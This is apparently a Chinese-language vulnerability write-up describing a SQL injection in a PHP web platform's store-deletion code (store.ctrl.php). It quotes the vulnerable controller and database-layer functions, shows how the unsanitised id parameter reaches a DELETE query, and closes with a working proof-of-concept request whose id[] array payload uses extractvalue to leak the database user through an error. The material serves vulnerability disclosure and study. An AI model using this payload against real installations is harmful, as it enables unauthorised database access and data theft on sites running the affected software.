/web/source/mc/store.ctrl.php
if($do =='delete') { $count = pdo_fetchcolumn('SELECT COUNT(*) FROM ' . tablename('activity_clerks') . ' WHERE uniacid = :uniacid AND storeid = :id', array(':id' => $_GPC['id'], ':uniacid' => $_W['uniacid'])); $count = intval($count); if($count > 0) { message("该门店下有{$count}名店员.请将店员变更到其他门店后,再进行删除操作", referer(), 'error'); } pdo_delete('activity_stores',array('id' => $_GPC['id'], 'uniacid' => $_W['uniacid'])); message('删除成功',referer(), 'success'); }
发现其中对id的获取直接带入pdo_delete中进行操作。查看下pdo_delete怎么进行的
function pdo_delete($table, $params = array(), $glue = 'AND') { return pdo()->delete($table, $params, $glue); }
再继续查看下delete函数
public function delete($table, $params = array(), $glue = 'AND') { $condition = $this->implode($params, $glue); $sql = "DELETE FROM " . $this->tablename($table); $sql .= $condition['fields'] ? ' WHERE '.$condition['fields'] : ''; return $this->query($sql, $condition['params']); }
直接是获取相关参数,直接带入表中进行删除动作。既然delete中没有进行任何的非删除之外的动作。就可以直接注入了。直接上poc
http://127.0.0.1/web/index.php?c=mc&a=store&do=delete post id[]=a/&id[]=) and extractvalue(1, concat(0x5c, (select user())))--
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论